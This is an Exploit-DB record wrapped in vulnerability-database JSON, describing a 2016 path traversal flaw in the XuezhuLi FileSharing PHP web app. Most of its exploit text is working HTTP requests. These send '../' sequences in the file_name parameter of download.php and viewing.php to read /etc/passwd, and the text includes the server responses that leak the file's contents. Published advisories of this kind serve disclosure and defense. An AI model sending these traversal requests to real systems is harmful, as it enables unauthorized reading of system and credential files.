{"id": "EDB-ID:40009", "hash": "854b4337d514e281b320ca1c799c12de", "type": "exploitdb", "bulletinFamily": "exploit", "title": "XuezhuLi FileSharing - Directory Traversal", "description": "XuezhuLi FileSharing - Directory Traversal. Webapps exploit for php platform", "published": "2016-06-23T00:00:00", "modified": "2016-06-23T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/40009/", "reporter": "HaHwul", "references": [], "cvelist": [], "lastseen": "2016-06-23T17:04:27", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2016-06-23T17:04:27"}, "vulnersScore": 5.0}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/40009/", "sourceData": "# Exploit Title: XuezhuLi FileSharing - Path Traversal Vulnerability\r\n# Date: 2016-06-23\r\n# Exploit Author: HaHwul\r\n# Exploit Author Blog: www.hahwul.com\r\n# Vendor Homepage: https://github.com/XuezhuLi\r\n# Software Link: https://github.com/XuezhuLi/FileSharing/archive/master.zip\r\n# Version: Latest commit\r\n# Tested on: Debian [wheezy]\r\n\r\n### Vulnerability\r\n 1. download.php -> file_name parameter\r\n 2. viewing.php -> file_name parameter\r\n\r\n### Vulnerability 1 - download.php\r\nGET /vul_test/FileSharing/download.php?file_name=../../../../../../../../../../../../../etc/passwd HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://127.0.0.1/vul_test/FileSharing/userpage.php\r\nCookie: W2=dgf6v5tn2ea8uitvk98m2tfjl7; __utma=96992031.1679083892.1466384142.1466384142.1466398535.2; __utmz=96992031.1466384142.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=1%7C25; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1466565345; bdshare_firstime=1466565462740; PHPSESSID=uetimns4scbtk46c8m6ab7upp1\r\nConnection: keep-alive\r\n\r\nHTTP/1.1 200 OK\r\nDate: Thu, 23 Jun 2016 06:17:58 GMT\r\n..snip..\r\nContent-Type: application/octet-stream\r\n\r\n\r\nroot:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\r\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\r\nsync:x:4:65534:sync:/bin:/bin/sync\r\n\r\n# ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ----\r\n### Vulnerability 2 - viewing.php\r\nGET /vul_test/FileSharing/viewing.php?file_name=../../../../../../../../../../../../../etc/passwd HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://127.0.0.1/vul_test/FileSharing/userpage.php\r\nCookie: W2=dgf6v5tn2ea8uitvk98m2tfjl7; __utma=96992031.1679083892.1466384142.1466384142.1466398535.2; __utmz=96992031.1466384142.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=1%7C25; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1466565345; bdshare_firstime=1466565462740; PHPSESSID=uetimns4scbtk46c8m6ab7upp1\r\nConnection: keep-alive\r\n\r\nHTTP/1.1 200 OK\r\nDate: Thu, 23 Jun 2016 06:19:49 GMT\r\nServer: Apache/2.4.10 (Ubuntu)\r\n..snip..\r\nContent-Type: text/plain;charset=UTF-8\r\n\r\nroot:x:0:0:root:/root:/bin/bash\r\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\r\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{}